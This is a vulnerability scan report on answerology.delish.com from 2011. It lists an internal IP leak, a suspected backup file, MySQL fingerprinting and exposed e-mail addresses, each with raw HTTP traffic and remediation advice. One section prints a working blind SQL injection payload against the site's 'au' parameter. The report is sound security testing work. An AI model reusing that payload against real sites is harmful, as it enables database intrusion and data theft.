First ensure that this is not a false positive. Due to the nature of the issue, Netsparker could not confirm that this IP address is the real internal address of the target web server or of its network. If it is, remove it. In this case the evidence is stronger than the [Possible] label suggests: 172.20.65.105 lies in the RFC 1918 range 172.16.0.0/12 and appears in the response body as the HTML comment <!-- 172.20.65.105 9/17/2011 9:34:29 AM -->, an address paired with a local timestamp, which is the shape of a debugging stamp emitted by the page template to identify the node that rendered the page (useful behind a load balancer, but not something a client should see). The stamp also reveals the server's local time zone, since the Date header on the same response reads 13:34:30 GMT. Find the template or control that writes this comment and remove it, or write the information to server-side logs instead.

Classification

PCI v1.2-6.5.6 CWE-200 CAPEC-118 WASC-13
- /index.aspx

/index.aspx

http://answerology.delish.com/index.aspx?template=page_not_found.ascx&error=

Parameters

Parameter Type Value
template GET page_not_found.ascx
error GET

Extracted IP Address(es)

172.20.65.105

Request

GET /index.aspx?template=page_not_found.ascx&error= HTTP/1.1
Referer: http://answerology.delish.com//index.aspx?template=cobrand_question_of_day_widget.ascx&widgetName=delish_rightrail&au=delishmodules&__as_javascript=true
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: answerology.delish.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Content-Length: 72529
Date: Sat, 17 Sep 2011 13:34:30 GMT
Connection: keep-alive
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: -1
Pragma: no-cache


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"><html xmlns:fb="http://www.facebook.com/2008/fbml" lang="en"><head> <title>FAQs: About Answerology.com</title><meta name="title" content="FAQs: About Answerology.com" /><meta name="description" content="At Answerology.com, you can ask the opposite sex anything! Anonymously survey our global community of men and women. Get real answers to your most intimate relationship questions. Ask fun questions, get fun answers. Pose serious questions, get serious answers. Answerology. The modern way to explore life's age-old dilemna -- miscommunication between the sexes." /><meta name="keywords" content="adult personal ads, affairs, advice, ask a question, anonymous,answers, articles, attractive, attractive men, attractive women, breaking up, chat, change of heart, companion, commitment, dating advice, dating tips, divorce, divorced, engagements, expert advice, hooking up, hot guys, hot girls, marriage, miscommunication, online dating, parenting, picking up, question, questions, relationship, relationships, relationship advice, romance, secrets, serious relationship, sex, sexual, sex tips, weddings, what woman want, what women want" /> <!-- 172.20.65.105 9/17/2011 9:34:29 AM --> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta NAME="zrobots" CONTENT="all" /> <meta NAME="revisit-after" CONTENT="5 days" /> <script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.3.2.min.js"></script> <title>Recipes, Party Food, Cooking Guides, Dinner Ideas, and Grocery Coupons - Delish.com</title><meta name="description" content="For home cooks hungry for easy family meals: Find thousands of tested recipes, menus, cooking shortcuts, dinner ideas, chef tips, and more at Delish.
" /><link rel="apple-touch-icon" href="/cm/delish/site_images/favicon/apple-touch-icon.png" /><link rel="shortcut icon" href="/cm/delish/site_images/favicon/favicon.ico" type="image/vnd.microsoft.icon" />
<link rel="shortcut icon" href="/cm/delish/site_images/favicon/favicon.ico" type="image/x-icon" /><!-- **** Canonical Meta-tag **** --><link rel="canonical" href="http://www.delish.com/answerology-wrapper/"/><!-- **** RSS **** --><link rel="alternate" type="application/rss+xml" href="http://www.delish.com" /><!-- **** STYLES **** --><!-- MSN Video Player CSS File --><!--<link rel="stylesheet" type="text/css" href="/cm/delish/styles/channels.css"></link>--><link rel="stylesheet" href="http://img.widgets.video.s-msn.com/js/ch/channels.css" /><script type"text/javascript"> /* Set document.domain early for proper ad render */ try { document.domain = 'delish.com'; } catch(ex){}</script><style type="text/css"> /* IE Hover htc */ body { behavior: url('http://games.delish.com/proxy.aspx?url=http://www.delish.com/cm/delish/scripts/csshover3.htc'); }</style><link rel="stylesheet" href="/cm/delish/styles/global.css" type="text/css" /><link rel="stylesheet" href="/cm/delish/styles/header.css" type="text/css" /><!-- **** SCRIPTS **** --><!-- Static Promo: restrict access if subdomain not match category --><!-- End Static Promo --><script src="/cm/shared/scripts/jquery-1.4.2.min.js" language="javascript" type="text/javascript"></script><!-- refresh ads --><!-- quiz includes --><!-- /quiz includes --><script src="/cm/delish/scripts/jquery.tooltip.pack.js" type="text/javascript" language="javascript"></script><script language="javascript" src="/cm/shared/scripts/jqXMLUtils.js"></script><script src="/cm/shared/scripts/jquery.bgiframe.min.js" type="text/javascript"></script><!-- games_wrapper --><script language="javascript" src="/cm/delish/scripts/rf-tmpl-ext.js" type="text/javascript"></script><script language="javascript" src="http://img.widgets.video.s-msn.com/js/embed.js"></script><script language="javascript" type="text/javascript">//INITIALIZE GLOBAL CONSTANTSvar articleID = "";var rf_cache_bust = Math.floor(Math.random()*100001);var site_name = "Delish";//Article Source 
Codevar source_id = "";//Set up the source link type - based on content type//var pageAdsParams = {"sub_cat_prefixes":"","article_type_prefix":null,"site_prefix":"delish","position_list":"ams_delish_1x1,ams_delish_footer,ams_delish_networktout,ams_delish_sponsored_links,ams_delish_top","ad_sub_category_prefix":null,"subdomain":"www","ams_promo":null,"url_name":null,"keywords":null,"browser_path":"/answerology-wrapper/?ignoreCache=1","section_prefix":"answerology-wrapper","ad_category_prefix":null,"cat_prefixes":""};</script><script type="text/javascript" src="/cm/shared/scripts/cookies.js"></script><script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script><link href="/cm/delish/styles/autocomplete.css" rel="stylesheet" type="text/css"><script src="/cm/delish/scripts/autocomplete_bgiframe_delish.js" type="text/javascript"></script><!--<gTMPL_INCLUDE NAME="xs_script_include_user_session.tmpl">--><!-- TEST script includes xs_script_include_user_session.tmpl DIRECT INSERT--><script>var _ghearst_vars = {};//_ghearst_vars["ams_ads_script_src"] = "";</script><script src="/cm/shared/scripts/get_mag_user_local_v02.js" type="text/javascript" ></script><script>if ($h.session.ha){ $h.util.buildScriptTag("&ha=1"); } else { }</script><!-- Omniture global variable --><script language="javascript">var s_prop49 = '';</script><script type="text/javascript" language="javascript" src="/cm/delish/scripts/login.js"></script><script type="text/javascript" language="javascript" src="/cm/delish/scripts/global.js"></script><!-- search and global js go here --><!-- MSN Video Player Scripts --><script src='/cm/delish/scripts/jquery.simplemodal.js' type='text/javascript'></script><!-- Confirm JS and CSS files for Logout--><script src='/cm/delish/scripts/confirm.js' type='text/javascript'></script><link type='text/css' href='/cm/delish/styles/confirm.css' rel='stylesheet' media='screen' /><!--[if lt IE 7]><link type='text/css' href='/cm/delish/styles/basic_ie.css' 
rel='stylesheet' media='screen' /><![endif]--><script language="javascript" type="text/javascript" src="/cm/shared/ria/swfobject2.1/swfobject.min.js"></script><script language="javascript" type="text/javascript" src="/cm/delish/scripts/flash.js"></script><script language="javascript" type="text/javascript">//INITIALIZE GLOBAL FUNCTIONS/*@cc_on @*//*@if (@_jscript_version < 5.7)$(document).ready(function(){ $('#global_footer').css('display','none'); $('#global_footer').css('display','block');});/*@end @*/</script><script language="javascript">function refreshAds(){ //Hearst tracking if (top.s) { pageviewTracking(); } //MSN tracking if (top.s_msn) { if ( s_msn.referrer == location.href ) { s_msn.referrer=''; } s_msn.t(); } try { wlAnalytics.TrackPage(); } catch (e) { $.track.trackInfo.userStatic.requestId = null; $.track.trackPage(); } var spans = document.getElementsByTagName('span'); var adDivs = new Array(); for(var i=0;i<spans.length;i++){ if(spans[i].id.indexOf('ams_del') > -1 && spans[i].firstChild){ if(spans[i].firstChild.nodeName == 'DIV'){ adDivs.push(spans[i].firstChild); } } } for(var i=0;i<adDivs.length;i++){ dapMgr.displayAd(dapMgr.getAdItemIndex(adDivs[i].id)); }}</script><script language="javascript" type="text/javascript" src="/cm/delish/scripts/omniture-tags.js"></script><!-- SHARE THIS SCRIPT DONT REMOVE --><script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=d63a4976-501a-446d-81e6-434d03d8388c&amp;type=website&amp;buttonText=&amp;embeds=true&amp;post_services=facebook%2Ctwitter%2Cdelicious%2Cstumbleupon%2Cmyspace%2Cdigg%2Creddit%2Cblogger%2Cwordpress%2Ctypepad%2Cgoogle_bmarks%2Cwindows_live%2Cfark%2Cbus_exchange%2Cpropeller%2Cnewsvine%2Clinkedin%2Ctechnorati%2Cmixx%2Cybuzz%2Cfriendfeed&amp;linkfg=%23668c1f&amp;offsetLeft=-180;onmouseover=false"></script><!-- //END FO SHARE THIS SCRIPT --><!-- Social --><!--xs_social_metatag_includes.tmpl--><meta property="og:description" content="For home cooks hungry for easy 
family meals: Find thousands of tested recipes, menus, cooking shortcuts, dinner ideas, chef tips, and more at Delish.
" /><!--/xs_social_metatag_includes.tmpl--><!-- /Social --><!-- Handle print function --><script language="javascript" type="text/javascript">$(document).ready(function(){ // Action for Print button Viral Tools $(".printButton a").click(function() { window.open("/print-this/" + this.id + "?page=all","Print","width=1000,height=800,menubar=no,toolbar=no,scrollbars=yes"); });});</script><!-- Handle print function --></head> <link rel="shortcut icon" href="/cobrands/delish/images/favicon.ico" type="image/vnd.microsoft.icon" /> <link rel="shortcut icon" href="/cobrands/delish/images/favicon.ico" type="image/x-icon" /> <link rel="stylesheet" href="/cobrands/delish/cobrand_styles.css?v=403838316"> <!--[if lte IE 7]><script src="/cssjs/ie-css3.js"></script><![endif]--> <script type="text/javascript" src="/cssjs/jquery.form.js"></script> <script type="text/javascript" src="/cssjs/jquery.validate.min.js"></script> <script type="text/javascript" src="/fckeditor/fckeditor.js"></script> <script language="JavaScript" type="text/javascript" src="/cssjs/UserReferrerGetter.js?v=403838316"></script> <script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v=403838316"></script> <script language="JavaScript" type="text/javascript" src="/cssjs/CharacterCounter.js?v=403838316"></script> <script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory.js?v=403838316"></script> <script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v=403838316"></script> <script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout.js?v=403838316"></script> <script language="JavaScript" type="text/javascript" src="/cssjs/KnightRidderLayout.js?v=403838316"></script> <script language="JavaScript" type="text/javascript" src="/cssjs/countdownTimer.js?v=403838316"></script> <script language="JavaScript" type="text/javascript" src="/cobrands/marieclaire/MarieClaireLayout.js?v=403838316"></script> <script language="JavaScript" 
type="text/javascript" src="/cobrands/redbookmag/RedbookmagLayout.js?v=403838316"></script> <script language="JavaScript" type="text/javascript" src="/cobrands/cosmopolitan/CosmopolitanLayout.js?v=403838316"></script> <script language="JavaScript" type="text/javascript" src="/cobrands/seventeen/SeventeenLayout.js?v=403838316"></script> <script language="JavaScript" type="text/javascript" src="/cobrands/goodhousekeeping/GoodhousekeepingLayout.js?v=403838316"></script> <script language="JavaScript" type="text/javascript" src="/cobrands/cosmogirl/CosmogirlLayout.js?v=403838316"></script> <script language="JavaScript" type="text/javascript" src="/cobrands/quickandsimple/QuickAndSimpleLayout.js?v=403838316"></script> <script language="JavaScript" type="text/javascript" src="/cobrands/delish/DelishLayout.js?v=403838316"></script> <script language="JavaScript" type="text/javascript" src="/cobrands/realbeauty/RealBeautyLayout.js?v=403838316"></script> <script type="text/javascript" src="/cssjs/headers.js?v=403838316"></script> <script language="JavaScript"> var args = getArgs(location.search.substring(1)); var factory = new LayoutFactory( false, ["purchase_gc.ascx"], ["registration.ascx"], args["template"] ); var cookiesToSet = []; var referrerGetter = new UserReferrerGetter(readCookie("referrer"), args["setReferrer"], cookiesToSet, document.referrer, document.location.href, ["testing.answerology.com", "answerology.com", "www.answerology.com", "hearst.answerology.com"], "", ""); var layout = factory.getLayout( 'delish' ); for (i=0; i<cookiesToSet.length; i++) { createCookie("referrer",cookiesToSet[i] , 1000, ' .delish.com' ); } </script> <script language="JavaScript"> var Answerology = { isLoggedIn: false, template: 'page_not_found.ascx', facebook: { appId: '112965278727107' } } </script> <!-- AUDIENCESCIENCE AD TAG CODE --> <script type="text/javascript"> <!-- var rsi_segs = []; var segs_beg=document.cookie.indexOf('rsi_segs='); if (segs_beg>=0){ 
segs_beg=document.cookie.indexOf('=',segs_beg)+1; if(segs_beg>0){ var segs_end=document.cookie.indexOf(';',segs_beg); if(segs_end==-1) segs_end=document.cookie.length; rsi_segs=document.cookie.substring(segs_beg,segs_end) .split('|'); } } var segLen=20; var segQS=""; if (rsi_segs.length<segLen){segLen=rsi_segs.length} for (var i=0;i<segLen;i++){ segQS+=("rsi"+"="+rsi_segs[i]+";") } //--> </script> <!-- END AUDIENCESCIENCE AD TAG CODE --> <script type="text/javascript" src="/cssjs/channels.js?v=403838316"></script> <script> //coaches_eyebrow bb_cgt="AOL Living Sites"; bb_cg=[{n:'N',t:'Beauty and Style',u:'http://living.aol.com/aolliving/beauty_style',v:'22',e:''}, {n:'N',t:'Coaches',u:'http://coaches.aol.com/',v:'22',e:''}, {n:'N',t:'Diet and Fitness',u:'http://diets.aol.com/',v:'22',e:''}, {n:'N',t:'Food',u:'http://food.aol.com/food/channel',v:'22',e:''}, {n:'N',t:'Health',u:'http://health.aol.com/',v:'22',e:''}, {n:'N',t:'Home',u:'http://homechannel.aol.com/',v:'22',e:''}, {n:'N',t:'Horoscopes',u:'http://horoscopes.aol.com/',v:'22',e:''}, {n:'N',t:'Parenting',u:'http://parenting.aol.com/parenting/onlyonaol',v:'22',e:''}]; </script> <script> document.write( layout.getCSS() ); </script> <script> document.write( layout.getStyle() ); </script> <!-- FASTCLICK.COM INTERSTITIAL HEAD CODE v1.0 for answerology.com --> <script type="text/javascript"> <!-- function FCx(x){ var min=15; // minimum minutes between interstitials (needs to be >15) if(x.indexOf('get.media')>0){ x=unescape(x.substring(x.indexOf('&url=')+5,x.length)); }else{ if(document.cookie.indexOf('CxIC=1')<=0){ x='http://media.fastclick.net/w/get.media?sid=16779&m=5&tp=6&url='+escape(x); var date_ob=new Date(); date_ob.setTime(date_ob.getTime()+min*1000*60); document.cookie='FCxIC=1; path=/; expires='+date_ob.toGMTString(); } } return x } // --> </script> <!-- FASTCLICK.COM INTERSTITIAL HEAD CODE v1.0 for answerology.com --></head><body><div id="fb-root"></div><div id="wrapper"><script> 
layout.getHeaderBoxAd('other');</script><script> layout.getHeaderBox(referrerGetter.execute());</script>

<div id="container"> <!-- BEGIN MSN UX STYLE & SCRIPT INCLUDES --> <script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/core.js"></script> <script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/2/report.js"></script> <link rel="stylesheet" href="/cm/delish/styles/msn_header.css" type="text/css" /> <!--[if IE]> <link rel="stylesheet" href="/cm/delish/styles/msn_header_ie.css" type="text/css" /> <![endif]--> <script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/4/mozcompat.js"></script> <!-- END MSN UX STYLE & SCRIPT INCLUDES --><div id="msn_header"> <div id="msn_header_ad"> <div id="ad_container"> <span id="ams_delish_top"><div id="divID_DLSRD1" name="div_DLSRD1" ..
[Possible] Backup File Found

1 TOTAL
LOW
Netsparker identified a possible backup file on the web server. The finding is flagged [Possible] because it rests only on the 200 status of the response below, not on the file's contents.

Impact

Backup files can contain old or current versions of a file on the web server. This could include sensitive data such as password files or even the application's source code. For an ASP.NET site, a readable index.aspx.cs would be the code-behind of the main page, i.e. its server-side logic, including the database access that the SQL injection finding in this report exploits. This class of issue normally leads to further vulnerabilities or, at worst, to direct disclosure of sensitive information.

Remedy

Do not store backup files on production servers. Here the evidence is weak: the request for /index.aspx.cs returned 200 OK, but the 84-byte body is a generic error message rather than C# source, so the application answers its own error page with a 200 status instead of a 404 or 500. That behaviour is what made the scanner report the file, and it defeats any status-based check. Confirm by requesting a name that certainly does not exist (a random .cs name in the same directory) and comparing the two responses; if they are identical, this finding is a false positive and the real problem is that error responses do not carry an error status. Code-behind files should in any case never be present in the deployed site: the default ASP.NET configuration maps *.cs to HttpForbiddenHandler and answers with 403, so a real hit would mean the files were deployed and that protection removed.

Classification

OWASP A7 PCI v1.2-6.5.10 PCI v2.0-6.5.6 CWE-425 CAPEC-87 WASC-34
- /index.aspx.cs

/index.aspx.cs

http://answerology.delish.com/index.aspx.cs

Request

GET /index.aspx.cs HTTP/1.1
Referer: http://answerology.delish.com/index.aspx.cs
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: answerology.delish.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Content-Encoding:
Date: Sat, 17 Sep 2011 13:44:44 GMT
Content-Length: 84
Connection: keep-alive
Cache-Control: private


There has been an error processing your request. Please try again later.
Forbidden Resource

1 TOTAL
INFORMATION
CONFIRMED
1
Access to this resource has been denied by the web server. The 403 below is IIS refusing to list the directory ("Directory Listing Denied"), not refusing its contents: files under /fckeditor/ are still served normally, as the page's own reference to /fckeditor/fckeditor.js shows, so the finding only confirms that directory browsing is disabled. This is generally not a security issue, and is reported here for information purposes.

Impact

There is no impact resulting from this issue.
- /fckeditor/

/fckeditor/ CONFIRMED

http://answerology.delish.com/fckeditor/

Request

GET /fckeditor/ HTTP/1.1
Referer: http://answerology.delish.com/fckeditor/fckeditor.js
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: answerology.delish.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 403 Forbidden
Content-Length: 218
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 13:34:32 GMT
Connection: keep-alive
Vary: Accept-Encoding


<html><head><title>Error</title></head><body><head><title>Directory Listing Denied</title></head><body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</body></body></html>
MySQL Database Identified

1 TOTAL
INFORMATION
CONFIRMED
1
Netsparker identified that the target web site uses MySQL. The fingerprint comes from the confirmed SQL injection in the au parameter: the probe in the request below relies on MySQL-specific syntax (IF(), IFNULL(), CHAR() with several arguments, and the "-- " comment, which MySQL only honours when followed by whitespace), and the application's responses differed depending on whether that expression evaluated true or false, which a different database engine would have rejected outright. This is generally not a security issue in itself and is reported here for information purposes.

Impact

This issue is reported as additional information only. There is no direct impact arising from this issue.
- //index.aspx

//index.aspx CONFIRMED

http://answerology.delish.com//index.aspx?template=cobrand_question_of_day_widget.ascx&widgetName=de..

Request

GET //index.aspx?template=cobrand_question_of_day_widget.ascx&widgetName=delish_rightrail&au=-delishmodules%27OR%201=1)%20AND%201=(SELECT%20IF((IFNULL(ASCII(SUBSTRING((SELECT%20CONCAT(CHAR(78),CHAR(69),CHAR(84),CHAR(83),CHAR(80),CHAR(65),CHAR(82),CHAR(75),CHAR(69),CHAR(82))),5,1)),0)=88),1,2))--%20&__as_javascript=true HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: answerology.delish.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Content-Encoding:
Date: Sat, 17 Sep 2011 13:45:36 GMT
Content-Length: 713
Connection: keep-alive
Cache-Control: no-cache
Expires: -1
Pragma: no-cache


document.write("\n");document.write("\n");document.write("<div style=\"height:40px;font-size:14px;line-height:18px;color:#668C1F;padding:0 0 10px 50px;background:url(http://answerology.delish.com//cobrands/delish/widgets/delish_rightrail/assets/qmark.png) no-repeat;\">\n");document.write(" Good snacks for get togethers?\n");document.write("</div>\n");document.write("<div style=\"height:100px;overflow:hidden;padding:0 0 15px;\">\n");document.write(" I'm hosting a party and need some suggestions for salty snacks. I've got the sweet stuff down.<br /><br />\n");document.write("- Asked By angzt\n");document.write("</div>\n");document.write("<div style=\"text-align:right;padding:0 10px 6px 0;overflow:hidden;zoom:1;\">\n");document.write(" <a href=\"http://answerology.delish.com//index.aspx?template=answer_question.ascx&question_id=2646&type=EditedDialog&query=recent_questions&showEditedDialogs=true&click=ans_uni\" style=\"float:right;height:26px;overflow:hidden;\"><img src=\"http://answerology.delish.com//cobrands/delish/widgets/delish_rightrail/assets/btn-answer.png\" alt=\"Answer\" style=\"border:0\" onmouseover=\"this.style.margin='-26px 0 0'\" onmouseout=\"this.style.margin='0'\" /></a>\n");document.write("</div>\n");document.write("<div style=\"border-top:1px dashed #e4e4e4;text-align:right;padding:6px 10px 0 0\">\n");document.write(" <a href=\"http://answerology.delish.com//index.aspx/best_of/2646_Good-snacks-for-get-togethers.html?query=recent_questions&kr=true\" style=\"color:#668C1F;text-decoration:none;font-size:13px;\" onmouseover=\"this.style.color='#253E0B'\" onmouseout=\"this.style.color='#668C1F'\">See how other people responded</a> <span style=\"color:#F1003E\">»</span>\n");document.write("</div>\n");document.write("\n");
E-mail Address Disclosure

1 TOTAL
INFORMATION
Netsparker found e-mail addresses on the web site.

Impact

E-mail addresses discovered within the application can be used by both spam engines and brute-force tools. Furthermore, valid e-mail addresses may lead to social engineering attacks.

Remedy

Use generic e-mail addresses such as contact@ or info@ for general communications and remove user- or person-specific e-mail addresses from the web site; should direct contact be required, use submission forms for this purpose.

Classification

OWASP A6 PCI v1.2-6.5.6 WASC-13
- /index.aspx

/index.aspx

http://answerology.delish.com/index.aspx?template=page_not_found.ascx&error=

Parameters

Parameter Type Value
template GET page_not_found.ascx
error GET

Found E-mails

  • customerservice@Answerology.com
  • Info@Answerology.com

Request

GET /index.aspx?template=page_not_found.ascx&error= HTTP/1.1
Referer: http://answerology.delish.com//index.aspx?template=cobrand_question_of_day_widget.ascx&widgetName=delish_rightrail&au=delishmodules&__as_javascript=true
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: answerology.delish.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Content-Length: 72549
Date: Sat, 17 Sep 2011 13:34:30 GMT
Connection: keep-alive
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: -1
Pragma: no-cache


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"><html xmlns:fb="http://www.facebook.com/2008/fbml" lang="en"><head> <title>FAQs: About Answerology.com</title><meta name="title" content="FAQs: About Answerology.com" /><meta name="description" content="At Answerology.com, you can ask the opposite sex anything! Anonymously survey our global community of men and women. Get real answers to your most intimate relationship questions. Ask fun questions, get fun answers. Pose serious questions, get serious answers. Answerology. The modern way to explore life's age-old dilemna -- miscommunication between the sexes." /><meta name="keywords" content="adult personal ads, affairs, advice, ask a question, anonymous,answers, articles, attractive, attractive men, attractive women, breaking up, chat, change of heart, companion, commitment, dating advice, dating tips, divorce, divorced, engagements, expert advice, hooking up, hot guys, hot girls, marriage, miscommunication, online dating, parenting, picking up, question, questions, relationship, relationships, relationship advice, romance, secrets, serious relationship, sex, sexual, sex tips, weddings, what woman want, what women want" /> <!-- 172.20.65.105 9/17/2011 9:34:29 AM --> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta NAME="zrobots" CONTENT="all" /> <meta NAME="revisit-after" CONTENT="5 days" /> <script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.3.2.min.js"></script> <title>Recipes, Party Food, Cooking Guides, Dinner Ideas, and Grocery Coupons - Delish.com</title><meta name="description" content="For home cooks hungry for easy family meals: Find thousands of tested recipes, menus, cooking shortcuts, dinner ideas, chef tips, and more at Delish.
" /><link rel="apple-touch-icon" href="/cm/delish/site_images/favicon/apple-touch-icon.png" /><link rel="shortcut icon" href="/cm/delish/site_images/favicon/favicon.ico" type="image/vnd.microsoft.icon" />
<link rel="shortcut icon" href="/cm/delish/site_images/favicon/favicon.ico" type="image/x-icon" /><!-- **** Canonical Meta-tag **** --><link rel="canonical" href="http://www.delish.com/answerology-wrapper/"/><!-- **** RSS **** --><link rel="alternate" type="application/rss+xml" href="http://www.delish.com" /><!-- **** STYLES **** --><!-- MSN Video Player CSS File --><!--<link rel="stylesheet" type="text/css" href="/cm/delish/styles/channels.css"></link>--><link rel="stylesheet" href="http://img.widgets.video.s-msn.com/js/ch/channels.css" /><script type"text/javascript"> /* Set document.domain early for proper ad render */ try { document.domain = 'delish.com'; } catch(ex){}</script><style type="text/css"> /* IE Hover htc */ body { behavior: url('http://games.delish.com/proxy.aspx?url=http://www.delish.com/cm/delish/scripts/csshover3.htc'); }</style><link rel="stylesheet" href="/cm/delish/styles/global.css" type="text/css" /><link rel="stylesheet" href="/cm/delish/styles/header.css" type="text/css" /><!-- **** SCRIPTS **** --><!-- Static Promo: restrict access if subdomain not match category --><!-- End Static Promo --><script src="/cm/shared/scripts/jquery-1.4.2.min.js" language="javascript" type="text/javascript"></script><!-- refresh ads --><!-- quiz includes --><!-- /quiz includes --><script src="/cm/delish/scripts/jquery.tooltip.pack.js" type="text/javascript" language="javascript"></script><script language="javascript" src="/cm/shared/scripts/jqXMLUtils.js"></script><script src="/cm/shared/scripts/jquery.bgiframe.min.js" type="text/javascript"></script><!-- games_wrapper --><script language="javascript" src="/cm/delish/scripts/rf-tmpl-ext.js" type="text/javascript"></script><script language="javascript" src="http://img.widgets.video.s-msn.com/js/embed.js"></script><script language="javascript" type="text/javascript">//INITIALIZE GLOBAL CONSTANTSvar articleID = "";var rf_cache_bust = Math.floor(Math.random()*100001);var site_name = "Delish";//Article Source 
Codevar source_id = "";//Set up the source link type - based on content type//var pageAdsParams = {"sub_cat_prefixes":"","article_type_prefix":null,"site_prefix":"delish","position_list":"ams_delish_1x1,ams_delish_footer,ams_delish_networktout,ams_delish_sponsored_links,ams_delish_top","ad_sub_category_prefix":null,"subdomain":"www","ams_promo":null,"url_name":null,"keywords":null,"browser_path":"/answerology-wrapper/?ignoreCache=1","section_prefix":"answerology-wrapper","ad_category_prefix":null,"cat_prefixes":""};</script><script type="text/javascript" src="/cm/shared/scripts/cookies.js"></script><script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script><link href="/cm/delish/styles/autocomplete.css" rel="stylesheet" type="text/css"><script src="/cm/delish/scripts/autocomplete_bgiframe_delish.js" type="text/javascript"></script><!--<gTMPL_INCLUDE NAME="xs_script_include_user_session.tmpl">--><!-- TEST script includes xs_script_include_user_session.tmpl DIRECT INSERT--><script>var _ghearst_vars = {};//_ghearst_vars["ams_ads_script_src"] = "";</script><script src="/cm/shared/scripts/get_mag_user_local_v02.js" type="text/javascript" ></script><script>if ($h.session.ha){ $h.util.buildScriptTag("&ha=1"); } else { }</script><!-- Omniture global variable --><script language="javascript">var s_prop49 = '';</script><script type="text/javascript" language="javascript" src="/cm/delish/scripts/login.js"></script><script type="text/javascript" language="javascript" src="/cm/delish/scripts/global.js"></script><!-- search and global js go here --><!-- MSN Video Player Scripts --><script src='/cm/delish/scripts/jquery.simplemodal.js' type='text/javascript'></script><!-- Confirm JS and CSS files for Logout--><script src='/cm/delish/scripts/confirm.js' type='text/javascript'></script><link type='text/css' href='/cm/delish/styles/confirm.css' rel='stylesheet' media='screen' /><!--[if lt IE 7]><link type='text/css' href='/cm/delish/styles/basic_ie.css' 
